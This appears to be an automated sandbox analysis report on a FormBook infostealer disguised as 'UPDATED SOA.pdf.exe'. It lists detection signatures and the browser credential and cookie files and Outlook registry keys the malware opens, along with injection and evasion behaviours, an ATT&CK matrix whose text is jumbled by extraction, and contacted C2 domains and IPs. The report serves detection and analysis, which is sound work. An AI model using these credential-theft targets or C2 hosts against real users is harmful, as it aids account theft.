                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.UPDATED SOA.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.UPDATED SOA.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2036376886.0000000001830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4144018297.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4142807594.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2032904691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4143977148.00000000045B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4143949544.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2036740856.00000000019D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\expand.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\expand.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\expand.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\expand.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\expand.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\expand.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\expand.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\expand.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\expand.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.UPDATED SOA.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.UPDATED SOA.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2036376886.0000000001830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4144018297.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4142807594.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2032904691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4143977148.00000000045B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4143949544.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2036740856.00000000019D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		412
                Process Injection                		11
                Masquerading                		1
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		11
                Input Capture                		2
                Process Discovery                		Remote Desktop Protocol11
                Input Capture                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Archive Collected Data                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object Model1
                Data from Local System                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items14
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617612 Sample: UPDATED SOA.pdf.exe Startdate: 18/02/2025 Architecture: WINDOWS Score: 100 57 www.us-urbanservices.net 2->57 59 www.primeibes.live 2->59 61 14 other IPs or domains 2->61 73 Suricata IDS alerts for network traffic 2->73 75 Sigma detected: Scheduled temp file as task from temp location 2->75 77 Multi AV Scanner detection for submitted file 2->77 79 10 other signatures 2->79 10 UPDATED SOA.pdf.exe 7 2->10         started        14 TKgtDXuaZu.exe 5 2->14         started        signatures3 process4 file5 51 C:\Users\user\AppData\...\TKgtDXuaZu.exe, PE32 10->51 dropped 53 C:\Users\user\AppData\Local\...\tmpCB57.tmp, XML 10->53 dropped 55 C:\Users\user\...\UPDATED SOA.pdf.exe.log, ASCII 10->55 dropped 89 Adds a directory exclusion to Windows Defender 10->89 91 Injects a PE file into a foreign processes 10->91 16 UPDATED SOA.pdf.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        93 Multi AV Scanner detection for dropped file 14->93 25 schtasks.exe 14->25         started        27 TKgtDXuaZu.exe 14->27         started        signatures6 process7 signatures8 69 Maps a DLL or memory area into another process 16->69 29 S1OoUcW6nwo.exe 16->29 injected 71 Loading BitLocker PowerShell Module 19->71 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        process9 signatures10 95 Found direct / indirect Syscall (likely to bypass EDR) 29->95 42 expand.exe 29->42         started        process11 signatures12 81 Tries to steal Mail credentials (via file / registry access) 42->81 83 Tries to harvest and steal browser information (history, passwords, etc) 42->83 85 Modifies the context of a thread in another process (thread injection) 42->85 87 3 other signatures 42->87 45 S1OoUcW6nwo.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 63 www.choujiezhibo.net 192.186.58.31, 50054, 50055, 50056 PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL United States 45->63 65 www.us-urbanservices.net 185.125.27.32, 49877, 49895, 49910 INFOMANIAK-ASCH Switzerland 45->65 67 12 other IPs or domains 45->67 97 Found direct / indirect Syscall (likely to bypass EDR) 45->97 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.